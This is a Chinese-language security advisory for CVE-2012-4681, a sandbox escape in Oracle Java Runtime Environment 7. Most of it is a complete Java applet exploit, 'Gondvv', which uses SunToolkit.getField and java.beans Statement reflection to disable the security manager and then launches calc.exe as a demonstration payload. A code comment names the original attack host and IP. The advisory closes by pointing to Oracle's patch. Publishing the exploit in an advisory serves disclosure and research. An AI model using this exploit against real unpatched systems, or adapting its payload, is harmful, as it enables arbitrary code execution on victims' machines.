受影响系统:
Oracle Java Runtime Environment 7.x
Oracle Java Runtime Environment 1.7.x
描述:
BUGTRAQ ID: 55213
CVE ID: CVE-2012-4681
Sun Java Runtime Environment是一款为JAVA应用程序提供可靠的运行环境的解决方案。
Oracle JRE 7 update 6 build 1.7.0_06-b24及之前版本在实现上存在远程代码执行漏洞,攻击者可利用一个恶意的java applet绕过Java沙盒限制并加载其他类在应用中执行任意代码。
<*来源:0-day
链接:http://secunia.com/advisories/50133/
http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
//
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon…
//
package cve2012xxxx;
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
public class Gondvv extends Applet
{
public Gondvv()
{
}
public void disableSecurity()
throws Throwable
{
Statement localStatement = new Statement(System.class, “setSecurityManager”, new Object[1]);
Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL(“file:///”), new Certificate[0]), localPermissions);
AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
localProtectionDomain
});
SetField(Statement.class, “acc”, localStatement, localAccessControlContext);
localStatement.execute();
}
private Class GetClass(String paramString)
throws Throwable
{
Object arrayOfObject[] = new Object[1];
arrayOfObject[0] = paramString;
Expression localExpression = new Expression(Class.class, “forName”, arrayOfObject);
localExpression.execute();
return (Class)localExpression.getValue();
}
private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
throws Throwable
{
Object arrayOfObject[] = new Object[2];
arrayOfObject[0] = paramClass;
arrayOfObject[1] = paramString;
Expression localExpression = new Expression(GetClass(“sun.awt.SunToolkit”), “getField”, arrayOfObject);
localExpression.execute();
((Field)localExpression.getValue()).set(paramObject1, paramObject2);
}
public void init()
{
try
{
disableSecurity();
Process localProcess = null;
localProcess = Runtime.getRuntime().exec(“calc.exe”);
if(localProcess != null);
localProcess.waitFor();
}
catch(Throwable localThrowable)
{
localThrowable.printStackTrace();
}
}
public void paint(Graphics paramGraphics)
{
paramGraphics.drawString(“Loading”, 50, 25);
}
}
建议:
厂商补丁:
Oracle
——
Oracle已经为此发布了一个安全公告(alert-cve-2012-4681-1835715)以及相应补丁:
alert-cve-2012-4681-1835715:Oracle Security Alert for CVE-2012-4681
链接:http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html
评论关闭。